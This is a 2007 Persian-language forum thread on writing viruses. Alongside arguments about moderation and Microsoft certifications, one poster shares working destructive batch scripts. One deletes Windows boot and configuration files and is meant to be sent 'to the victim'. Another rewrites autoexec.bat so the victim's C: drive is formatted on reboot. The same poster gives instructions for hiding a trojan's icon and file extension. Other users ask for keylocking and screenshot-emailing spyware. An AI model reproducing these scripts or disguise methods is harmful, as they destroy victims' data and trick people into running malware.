15-04-2007, 01:02
دسته همه دوستان درد نکنه که تمامه این مدت من این تاپيک رو نگه داشتم. خيلی ممنون که به حرفام توجه کردين. ميشه بگی پسورد اون کتاب رو چجوری ميشه از اون سايت شلوق گرفت؟

از اين حرفت خيلي زورم گرفت چون شما حتي يك پست اموزشي نه تو اين تاپيك نه تو تاپيك هاي ديگه داشتيد
الان شما 61 پست دادي كه من برسي كردم ولي يكي هم يك مطلب اموزشي نبود بلكه
(خوب بود. بد نبود.به تاپيك من بيايد ..........بوده)
حالا كيا موافق هستند
----------------------------------------------------------------------------------------------------------------------------------
كسي طريقه bind كردن رو نميدونست

mazi_z_PSP
17-04-2007, 14:03
من قبلا هم تو يه تاپيک ديگه گفتم که سورس کد خيلی زياد دارم اما نميخوام در دسترس عموم قرار بدم. هرکی ميخواد باهام تماس بگيره از این هرفت هم خوشم نيومد بعد از این همه سعی و تلاش موقعی که شما نبودين که تاپيک بسته نشه این بود مزدم؟ بشکنه این دست که نمک نداره!!!
mr_afee202@yahoo.com

ولی در کل خيلی ازت ممنونم shirazhaker جان که تو تقريبا باعث شدی من بيشتر به این سايت بيم البته از oracle_eldorado هم ممنونم

بابا من نميخوام این تاپيک بسته شه لتف کنين بيان و مقاله بزارين.. این تاپيک ميتونه خيلی مفيد بشه

sina88_2004
25-04-2007, 00:42
سلام. دست همه درد نكنه. تاپيك آليه.
فقط يه چيز فراموش شده و اون خاصيت خود انتشاري ويروسهاست. اينطور نيست؟!؟
البته منظورم انتشار از طريق اينترنته(چون انتشار از طريق فلاپي و فلش رو فكر كنم خيليا بلدن).

mazi_z_PSP
27-04-2007, 14:47
سلام عزيز خوشحال شدم اومدی يه سری زدی.نه این مشکل بوجود نمياد مگر اینکه کسی که از اینا استفاده ميکنه به کارکردنشون وارد نباشه

navid_ice_heart_128
02-05-2007, 01:10
سلام يك سوال
دستوري به نام block كه صفحه كليد و موس را قفل مي كنه هر چي تو api گشتم نتونستم پيدا كنم ميشه كمك كنين

rouhallah
02-05-2007, 14:49
با سلام من آموزش های شما رو خوندم
ولی متوجه نشدم که برای ضمیمه کردن ویروس به یک فایل بدون تخریب اون باید چه کار کرد
لطفاً در این مورد کمکم کنید
نه که حتماً من میخوام با آموختن این روش ویروس بسازم
بلکه مهمتر از اون میخوام از این طریق بفهمم که همون طور که سورس ویروس چگونه اضافه میشه همون طور چطوری حذف میشه
لطفاً حتماً جوابم رو کامل بدهید
با تشکر فراون

CrazyTux
02-05-2007, 21:18
در اول برنامه بهregsetvalueexگیر میده و می گه
argument not optional
چی کارکنمl

Payman_62
03-05-2007, 01:50
من قبلا هم تو يه تاپيک ديگه گفتم که سورس کد خيلی زياد دارم اما نميخوام در دسترس عموم قرار بدم. هرکی ميخواد باهام تماس بگيره از این هرفت هم خوشم نيومد بعد از این همه سعی و تلاش موقعی که شما نبودين که تاپيک بسته نشه این بود مزدم؟ بشکنه این دست که نمک نداره!!!
mr_afee202@yahoo.com

بابا من نميخوام این تاپيک بسته شه لتف کنين بيان و مقاله بزارين.. این تاپيک ميتونه خيلی مفيد بشه

سلام.
شیراز هکر راست میگه. شما خیلی پست بیهوده میدی. بار دومه بهت اخطار میدم. کاری نکن به جای بسته شدن این تاپیک کار به بسته شدن آیدی خودت بینجامه.

شما هیچ کمکی به بسته نشدن این تاپیک نکردی. فقط پست های بی ارزشته که ممکنه باعث بسته شدن تاپیک شه.

سورساتم نگه دار برای خودت. کسی نیازی نداره. همه بچه های این انجمن خودشون منبع سورسن. وقتی اینترنت و سایت های سورس موجوده نیازی به شما نیست.

navid_ice_heart_128
03-05-2007, 15:33
سلام يك سوال
دستوري به نام block كه صفحه كليد و موس را قفل مي كنه هر چي تو api گشتم نتونستم پيدا كنم ميشه كمك كنين

mazi_z_PSP
03-05-2007, 21:41
سلام.
شیراز هکر راست میگه. شما خیلی پست بیهوده میدی. بار دومه بهت اخطار میدم. کاری نکن به جای بسته شدن این تاپیک کار به بسته شدن آیدی خودت بینجامه.

شما هیچ کمکی به بسته نشدن این تاپیک نکردی. فقط پست های بی ارزشته که ممکنه باعث بسته شدن تاپیک شه.

سورساتم نگه دار برای خودت. کسی نیازی نداره. همه بچه های این انجمن خودشون منبع سورسن. وقتی اینترنت و سایت های سورس موجوده نیازی به شما نیست.
ای بابا دستت درد نکنه. باشه ديگه پس این همه سورسی که بقيه گزاشتن چی؟ خب پس اونام نميزاشتن چون بقيه منبع سورسن. من هم خواستم کمکی بکنم

navid_ice_heart_128
04-05-2007, 14:25
دعواي شما كي تموم ميشه تا به من جواب بدين "block"

mazi_z_PSP
04-05-2007, 20:28
سلام يك سوال
عزيزم بهتره يه تاپيک جديد با این موضوع بسازی کارت راحت تر ميشه

BabyBoy
05-05-2007, 14:03
سلام يك سوال

به فرمت يك تايمر اضافه كن چون بعد از چند ثانيه از حالت بلاك خارج بشه
يك كامند هم ميخواد (اسماشونو تغيير نده)

در ضمن آقاي mazi_z_MCSD اگه هر كسي براي سوالش بخواد يه تاپيك درست كنه كه هيچي...
بحث هاي الكيتونم بزاريد براي يه جاي ديگه اين تاپك جاش نيست

BabyBoy
05-05-2007, 14:34
چند روز پيش يه ويروس به اسمه SoundMix ديدم كه براي اين كه خودشو مخفي نگه داره Folder options رو تو حالت Dont show Hidden Files نگه ميداشت، و نمي شد كه عوض بشه. :41:
رفتم دنبالش و خودم برنامشو نوشتم. :31:
دانلو برنامه ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
براي برگردوندنش به حالت اول مقداراشو مثل پايين كنيد

يا اين كه نهايتا system Restore كنيد
يه سوال هم از آقاي mazi_z_MCSD داشتم:
شما اصلا VB يا هر زبان برنامه نويسي ديگه اي بلديد؟

mazi_z_PSP
05-05-2007, 18:43
چند روز پيش يه ويروس به اسمه SoundMix ديدم كه براي اين كه خودشو مخفي نگه داره Folder options رو تو حالت Dont show Hidden Files نگه ميداشت، و نمي شد كه عوض بشه. :41:
رفتم دنبالش و خودم برنامشو نوشتم. :31:
دانلو برنامه ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
براي برگردوندنش به حالت اول مقداراشو مثل پايين كنيد

يا اين كه نهايتا system Restore كنيد
يه سوال هم از آقاي mazi_z_MCSD داشتم:
شما اصلا VB يا هر زبان برنامه نويسي ديگه اي بلديد؟
با اجازتون بله . البته نه به اندازه شما .شما استاد ما هستيد

mazi_z_PSP
05-05-2007, 18:43
البته اگر معنی کلمه MCSD رو بدونی بهتر متوجه ميشی

navid_ice_heart_128
06-05-2007, 01:09
به فرمت يك تايمر اضافه كن چون بعد از چند ثانيه از حالت بلاك خارج بشه
يك كامند هم ميخواد (اسماشونو تغيير نده)

در ضمن آقاي mazi_z_MCSD اگه هر كسي براي سوالش بخواد يه تاپيك درست كنه كه هيچي...
بحث هاي الكيتونم بزاريد براي يه جاي ديگه اين تاپك جاش نيست

مرسي دوست عزيز به خاطر لطفي كه كردي:11:

CrazyTux
06-05-2007, 06:30
براتون فردا یعنی صبح دوشنبه یک برنامه می زارم اگه خوشتان آمد بگید سورس ان را بزارم برنامه 20- 30 تا گزینه داره که بزنی می تونی ویروس عالی درست کنی و ...

Creeping Death
06-05-2007, 10:37
با تشکر از همه ی ویروس نویس های عزیز . مقاله ها بسیار به دردم خورد.

یک پیشنهادی برای همه ی افرادی دارم که می خواهند کامپیوترشان از اینترنت آلوده نشود. به نظر من با سیستم عامل لینوکس به اینترنت وصل شوید چون از امنیت بسیار بسیار بسیار بالایی برخوردار است.

در ضمن می خواستم ببینم اینجا کسی هست که بتواند برای این سیستم عامل ویروس بنویسد ؟

double_n
06-05-2007, 12:03
---------------- ویرایش شده توسط خودم --------------------

یکی از مدیران Delete بفرمایند :19:

mazi_z_PSP
06-05-2007, 14:16
MAZIجان، این کل کل رو بزار کنار، اگه میخوای چیزی یاد بگیری، مطالب رو بخون، اگه هم میخوای چیزی اینجا بزار که دیگران بخونن، خوب فکر کنم بعد از 10 صفحه موقع اش شده که بزاری مطالبت رو چون دیگه داره دیر میشه.
در مورد MCSD عرض کنم خدمتت، این گونه مدرکها خوبن ولی اگه صدتا از این مدرکها داشته باشی و VB و C و ASM هم بلد باشی، اگه خلاقیتی توش نباشه، نمیتونی ویروس بنویسی، چون ویروس نویسی و آنتی ویروس نویسی یه مبحث گسترده است که علاوه بر علم مورد نیازش،خلاقیت و پشتکار و... هم باید داشته باشی.
این کل کل هایی هم که با دیگر کاربران انجام میدی فقط نشون از این داره که.........
MCSD هم مدرک بزرگی نیست، خیلی از افرادی رو میشناسم که مدارکی بزرگ و معتبر گرفته اند ولی هیچ صحبتی از این مطلب نمی کنن، همینطور میشناسم افرادی که از این مدارک ندارند ولی ویروس نویسهای قدرتمندی هستند و حتی وقتی ویروسی می نویسن بعضی اوقات به کسی اطلاع نمیدن و فقط نتیجه خودشون رو میبینن و خودشون لذت می برن و......
خلاصه میگم، مدرک ملاک نیست، حاشیه رو کنار بزار و به اصل مطلب بچسب.

موفق و سربلند باشید
DevilHell
قربونت بشم. البته به این چيزايی که گفتی واقفم . در ضمن به نظر من MCSD يک مدرک خيلی بزرگ از مايکرسافت هستش البته این مدرک به درده کسی ميخوره که ازش درست استفاد کنه. با سعی و تلاش بسيار تو همه زمينه ها. حالا يک سول: به نظر شما MCSD ارزش و مقام بيشتری داره يا MCSE

mazi_z_PSP
06-05-2007, 14:17
البته همه این رو ميدونن که با مدرک و خوندن درس مربوطه خيلی از ديگران جلو ميوفتی و گرفتن يه مدرک مثل MCSD يه موفقيت بزرگ در زندگی يک فرد محصوب ميشه

double_n
06-05-2007, 16:45

navid_ice_heart_128
06-05-2007, 23:47
سلام يه چيزي به فكرم اومد كسي كد ميدونه كه از صفحه ي نمايش عكس بگيره و بعد جاي ذخيره كنه بعد به email كسي بفرسته به محض اين كه به اينترنت وصل شد

mazi_z_PSP
07-05-2007, 12:47
هیچ کدوم،
دوست عزیز در این مورد من از بیخ با مایکروسافت مخالفم. :21: :27:
ولی اگه هردوتا شونو بگیری بد نیست. :20:

موفق و سربلند باشید :10:
منم کاملا با نظر شما مخالفم. تا حالا کسی نتونسته رو دسته مايکرسافت بلند بشه. MCSD و MCSE مدرک هايی هستند که تازه در ایران وارد شدند و بازار کار بسيار مناسبی دارند. به جزع اینا این مدارک به دليل حجم مطالب درسی زياد و حرفه ای بودنشون بسيار خوب هستند و هر کسی که بتونه این مدارک رو بگيره مشخص ميشه که فردی بسيار باهوش و پر کار هستش. اگر هم این مدارک خوب نباشن برايه بقيه کشور ها اینطور هست ولی برايه کشوری مثله ما که جهان سوم هستيم این مدارک حکم طلا رو دارند البته به نظر من!

mazi_z_PSP
07-05-2007, 12:49
و يه پيشنهاد بهت ميکن اینکه رو نظرت درباره مايکرسافت فکر کن. کمی به تاريخ نگاه کن ببين کی کامپيوتر هارو به اینجا رسونده. که الان با آمدن ويستا دنيا رو قبضه کرده. البته با آمدن وينا در چند سال آينده انقلابی در این صنعت رخ ميده

shirazhaker
07-05-2007, 17:42
با سلام به علت شركت در مسابقات مدتي نبودم و فكر كنم تا كنكور 86 هم نباشم
بهر حال دورا دور اين متلب رو چك ميكنم از اقاي devilhell هم تشكر ميكنم. اگر مطلبي داري در باره ويروس نويس هاي بزرگ دنيا بزاريد تا بعضي ها متوجه بشن كه مدرك كه هيچي اصلا اونا چند سالشون بوده .ويروس ساسر كه يادتون مياد
در باره mcse , mcsd هم بايد بگم كه اينا ربطي به هم ندارن يكي مردكبرنامه نويسي و يكي مديريت شبكه
قول ميدم كه حتما شروع به يك ويروس نويسي كنم هر چند تئوري باشه

double_n
08-05-2007, 00:41
و يه پيشنهاد بهت ميکن اینکه رو نظرت درباره مايکرسافت فکر کن. کمی به تاريخ نگاه کن ببين کی کامپيوتر هارو به اینجا رسونده. که الان با آمدن ويستا دنيا رو قبضه کرده. البته با آمدن وينا در چند سال آينده انقلابی در این صنعت رخ ميده

دوست عزیز اگه کسی دیگه بود شاید بهتر از این پیشرفت می کرد، به نظر من این شخصی که فکر می کنید کامپیوتر رو به اینجا رسونده (جناب بیلی) اصلا بینش آینده نداشته و فقط به فکر پول جمع کردن بوده، ماشاله هزار ماشاله هم که کم جمع نکرده، حالا اون نوش جونش بشه استخون توی حلقش :31: ولی اگه فکر کنم حتی مشتی ماشاله هم بود از بیلی برای دنیای کامپیوتر بیشتر سود می داشت، تا حالا به حفره هایی که تو ویندوز هستن توجه کردی؟ به نظر من واسه شرکتی که بابت این چنین سیستم عاملهایی پول میگیره شرم آوره، تا حالا از خودت پرسیدی چرا به فکر ویروس نوشتن توی ویندوز افتادی؟ به نظرت اگه ویندوز سورسش باز بود چقدر دنیای کامپیوتر پیشرفت می کرد؟؟؟؟
راستی نسخه خریداری شده از ویندوز نصب کردی؟؟؟؟؟؟؟؟؟؟

بیلی خودش رشد کرد ولی به چی قیمتی؟ اینو خودم جواب میدم: در ازای ظلم به دنیای کامپیوتر.

راستی از باگ های توی ویستا خبر داری؟؟؟؟؟؟؟؟؟؟ میدونی مایکروشیت چه گندی زده؟؟؟
اینا یه سوالاتی بود که گفتم از خودت بپرسی اصلا جوابشون رو هم نمیخواد اینجا بزاری، منم دیگه از بیلی (:2: ) صحبت نمی کنم.

در مورد سن ویروس نویسها و ... مطالبی داشتم که از چه زبانهایی استفاده می کنند، چند سالشونه، چرا ویروس می نویسن؟ و... مطالبی داشتم و اگه پیدا کردم همینجا میذارم :10:

امیدوارم
موفق و سربلند باشید
DevilHell

mazi_z_PSP
08-05-2007, 08:48
در يکی از مصاحبه هايه بيل با نيويورک تايمز بيل گفته بود که ويستا فقط برايه بسته کردن دهن مردم و به عنوان يک استراحت گاه برايه مايکرسافت هستش. و برايه اینکه بتونن با ويستا فاصله 11 سال بين XP و وينا رو پر کنن. تا مايکرسافت بتونه بهتر و راحت تر رويه وينا کار کنه. و به این نکته هم توجه داشته باش که همين برنامه نويس ها و ويروس نويس ها مديون همين مايکروسافت هستند که برنامه خوب و عظيمی به نامه VB ساخته

mazi_z_PSP
08-05-2007, 08:51
با سلام به علت شركت در مسابقات مدتي نبودم و فكر كنم تا كنكور 86 هم نباشم
بهر حال دورا دور اين متلب رو چك ميكنم از اقاي devilhell هم تشكر ميكنم. اگر مطلبي داري در باره ويروس نويس هاي بزرگ دنيا بزاريد تا بعضي ها متوجه بشن كه مدرك كه هيچي اصلا اونا چند سالشون بوده .ويروس ساسر كه يادتون مياد
در باره mcse , mcsd هم بايد بگم كه اينا ربطي به هم ندارن يكي مردكبرنامه نويسي و يكي مديريت شبكه
قول ميدم كه حتما شروع به يك ويروس نويسي كنم هر چند تئوري باشه
در ضمن من صرفا ويروس نويس نيستم و نميخوام که ويروس بنويسم. من فقط از این فرصت استفاده کردم تا بتونم خودمو بيشتر با .... آشنا کنم. و يه تمرينی برام بشه. و .... رو هم برايه این دوست دارم که برنامه نويسی تحت شبکه رو بهم ياد ميده و هم يه مدرک بين الملّلی هستش

mazi_z_PSP
08-05-2007, 08:51
در ضمن من صرفا ويروس نويس نيستم و نميخوام که ويروس بنويسم. من فقط از این فرصت استفاده کردم تا بتونم خودمو بيشتر با .... آشنا کنم. و يه تمرينی برام بشه. و .... رو هم برايه این دوست دارم که برنامه نويسی تحت شبکه رو بهم ياد ميده و هم يه مدرک بين الملّلی هستش

در ضمن من صرفا ويروس نويس نيستم و نميخوام که ويروس بنويسم. من فقط از این فرصت استفاده کردم تا بتونم خودمو بيشتر با VB آشنا کنم. و يه تمرينی برام بشه. و MCSD رو هم برايه این دوست دارم که برنامه نويسی تحت شبکه رو بهم ياد ميده و هم يه مدرک بين الملّلی هستش

mazi_z_PSP
08-05-2007, 08:55
سلام دوستان امروز با یه آموزش بسیار خفن اومدم
این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه
برای ساختن این ویروس مراحل زیر رو انجام بدید
به نوت پد رفته و این عبارت رو بنویسید
del autotexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد اونو با فرمت bat سیو کنین و برای قربانی بفرستین

mazi_z_PSP
08-05-2007, 08:56
آیکون و پسوند تابلوی ترجان ها را به هر چی که دوست دارید [هک]
برای اینکار 2 راه موجود می باشد که من این 2 راه را برای شما میگم:
راه اول :
یک عدد فایل تروجان آماده کنید...
یه wordpad باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new برید و یه wordpad documernt باز کنید .
فایل تروجان رو کپی کنید و توی wordpad پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه word رها کنید .
حال همون فایلی رو که تو word گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید
بعد به edit برید و بعد به package object و روی برگه edit package کلیک کنید حالا در پبجره باز شده به edit برید و copy package رو بزنید .
در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste رو بزنید .
به همین آسونی فایل تروجان exe یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .
راه دوم :
بر روی فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه create shortcut را بر گزینید . حالا یه فایل از همون تروجان با اسم shortcut درست شده است حالا بر روی shortcut آن راست کلیک کنید و گزینه Properties را انتخاب کنید حال در پنجره باز شده جدید در بالای آن گزینه shortcut را انتخاب کنید و بعد بر روی گزینه change icon کیک کنید و در پنجره باز شده 100 ، 200 تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse آیکنی که خود شما دارید را برگزینید

mazi_z_PSP
08-05-2007, 08:56
یك ويروس براي فرمت كردن درايو C شخص مورد نظر [ويروس نويسی]

برنامه NotePad رو باز كنين بعد فرمان زير رو توش كپي و پيست كنيد:

@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format /autotest c:/q>nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
exit

حالا فايل را با پسوند bat ذخيره كنين. مواظب ياشين كه فايل رو اجرا نكنين چون كل اطلاعات درايو سي شما پاك مي شه!

اين فايل چه كار مي كنه؟
اول كل اطلاعات موجود تو فايل autoexe.bat رو پاك مي كنه بعد كد format /autotest c:/q رو توش مي زاره وقتي هدف شما كامپيوتر رو ريست و دوباره راه اندازي كنه اين كد اجرا مي شه و درايو سي فرمت مي شه!
------------------------
راستي اگه هم بخواين تعداد و نام پارتيشن مورد نظر رو با كمي تغيير توي فرمان ها مي تونين تعيين کنين

mazi_z_PSP
08-05-2007, 08:57
هکرها و دسته بندی حملات آنها [هک]

انواع هکرها:
1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه 100 ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!

2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!

3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.
4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!

انواع حمله هکرها:
- استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا 2 زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
- دستکاری اطلاعات (modification ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از 13 بشه 18!
- افزودن اطلاعات و جعل ( fabrication ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
- حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما 2 مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض 5 ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا 1 دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.

mazi_z_PSP
08-05-2007, 08:57
اینم از اینا. بعدن ميام بيشتر مطلب ميزارم. ديگه نميزارم این تاپيک بدون مطلب بمونه

mazi_z_PSP
08-05-2007, 10:44
آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد... [ويروس نويسی]

خوب اول یک
Notepad یا همان Txt Document
باز می کنید بعد دستور زیر را توی اون کپی میکنید و با فرمت
Bat
سیو میکنید...
C:
del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
مثل:
Virus.bat
به جای کلمه ویروس هم اسم مورد نظر را بگذارید...

mazi_z_PSP
08-05-2007, 10:49
آموزش کامل انواع هک [عمومي]

سلام اینم اموزش کامل انواع هک که شامل اموزش هک کردن سایت و وبلاگ هم میشه و به یه سری سوالات کلیدی شما هم جواب داده شده معمولا سوالهای شما در اولش ايناست ۱-هک چيه آيا وارد شدن به يه کامپيوتر هک محسوب ميسه؟ ۲-وقتی يه کامپيوتر خاموشه ميشه هکش کرد؟ ۳-آيا برای اينکه يک هکر شويم بايد خودمان يه بار هک شده باشيم؟ البته سوال که زياده ولی معمولا همه ی شماها همين ها رو میپورسين. حتما تو اين چند روزه در باره ی اين ويروس جديده خبرهايی شنيده ايد.يکيش وب لاگ خودم.که بعد از اون ماجرا ماکروسافت گفت patchمخصوص ويندوز ها ی گوناگون رو نصب کنيد.خوب اين يعنی چي؟يعنی اين که سيستم عامل ها را انسان ها درست ميکنن بنابراين خطای آن ميشه گفت ۵۰تا۵۰ است در نتيجه به اين خطاها bugگفته ميشود که هر شرکت تا اين سوتی ها رو ديده سريعا اين patchرو برای ماسمالی کردن و در امن ماندن از دست هکرها پخش ميکنه.خوب ببينيد بعضی از هکرها اصلا اين وظيفه را دارند که ضعف اين شرکتو نشان بدم البته ما نوع های مختلفی داريم که در حوصله اين مقاله نميگنجد . به چه چيزهايی برای شروع نياز داريم: ۱-ابتدا زبان Cرا فرابگيريد. برای چي؟برای صحبت با پورتهای مختلف ۲-Dosرا خوب بلد باشيد.برای چي؟برای استفاده از FTP SERVER ۳-دو سيستم عامل داشته باشيد .يکی از خانواده ی ويندوز و ديگری از خانواده ی Unix IP:مهمترين چيز و راحترين چيز در هکه که خيلی راحت به دست مياد و اهميت فوق العاده ای برای Telnetکردن به سايتهای مختلف و دودر کردن اينترنت و.... Whois:تعريف خاصی ندارد اما ميشه گفت اطلاعات هر سايت را به ما ميده Telnet:برای صحبت با ورتها و وارد شدن بهFTPالبته اين تعريف درست و کامل نيست. Port:در زبان فارسی به معنای بندر است خوب حالا کامپيوتر Serverرا جزيره در نظر بگيريد وکه چندين بندر دارد و هرکدام از اين بندرها کاره خاصی ميکنند. بدست آوردن IPخودمان بعد از اتصال به نت: 1-رفتن به CMDويندوز XPويا DOS۹۸وتايپ کردن اين عبارتnetstat -n 2-Clickراست کردن بر روی اون دوپنجره پايين Desktopهمان دو پنجره ای که وقتی به نت وصل هستيم چشمک ميزنه و بعد انتخاب گزينهSatusو زدن Deatilدر بالای پنجره و ديدن IPخودمان در پايين صفحه و IP SERVERدر بالای آن طبقه بندی IP ها: IPها به ۵ کلاسAتاEتقسيم ميشوندکه بر حسب اهميت کلاسAتاCمورد اهميت تر است و ما هر ۵ نوع را برای شما بيان ميکنيم ۱-قالب ۳۲ بيتی کلاس Aاين گونه است۷بيت شبکه و ۲۴ بيت کاربر.اگر IPرا اينگونه فرض کنيمxxx.yyy.zzz.rrrاين کلاس شامل تمام IPهايی 